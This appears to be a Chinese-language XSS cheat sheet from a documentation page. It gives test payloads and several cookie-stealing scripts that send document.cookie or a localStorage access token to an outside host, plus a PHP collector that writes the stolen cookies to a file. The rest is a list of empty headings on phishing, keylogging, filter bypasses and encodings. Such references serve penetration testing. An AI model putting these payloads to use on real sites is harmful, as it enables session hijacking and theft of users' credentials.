XSS

确定XSS

反射型XSS可使用payload:<script>alert(1)</script>
存储型不适宜alert(1)
更好的替代品
<script>alert(document.domain.concat("\n").concat(window.origin))</script>
<script>console.log("Test XSS from the search bar of page XYZ\n".concat(document.domain).concat("\n").concat(window.origin))</script>

打COOKIE

<svg/onload="javascript:document.location.href=('http://xx.xx.xx.xx:7777?cookie='+document.cookie)">
<script>document.location='http://localhost/XSS/grabber.php?c='+document.cookie</script>
<script>document.location='http://localhost/XSS/grabber.php?c='+localStorage.getItem('access_token')</script>
<script>new Image().src="http://localhost/cookie.php?c="+document.cookie;</script>
<script>new Image().src="http://localhost/cookie.php?c="+localStorage.getItem('access_token');</script>
获取的cookie写入文件
<?php
$cookie = $_GET['c'];
$fp = fopen('cookies.txt', 'a+');
fwrite($fp, 'Cookie:' .$cookie."\r\n");
fclose($fp);
?>

读取HTML

读文件

修改HTML

XSS+SSRF读取服务器文件

XSS克隆钓鱼

伪造页面钓鱼

键盘记录

更多PAYLOAD

更多XSS盲打工具

常见payload

远程Js

隐藏在输入框中的 XSS

带有 JavaScript 的 XSS

带有data的 XSS

文件中的 XSS

XML CDATA

XML 中的 XSS

SVG 中的 XSS

SVG 中的 XSS(短)

Markdown 中的 XSS

SWF flash 应用程序中的 XSS

CSS 中的 XSS

绕过过滤

大小写

标签黑名单

转义

使用不完整的 html 标签

字符串引号

标签中的引号

在 mousedown 事件中绕过引号

绕过“点”过滤

绕过字符串的括号

绕过括号和分号

绕过onxxxx=黑名单

绕过空格过滤

绕过电子邮件过滤

绕过document黑名单

在字符串中使用 javascript 绕过

重定向

其他方式的alert

>

绕过<>

;

HTML 编码

片假名库

楔形文字

Lontara

ECMAScript6

Unicode

UTF-7

UTF-8

UTF-16be

UTF-32

使用 BOM 绕过

奇怪的编码

jsfuck

CSP Bypass

最后更新于

这有帮助吗?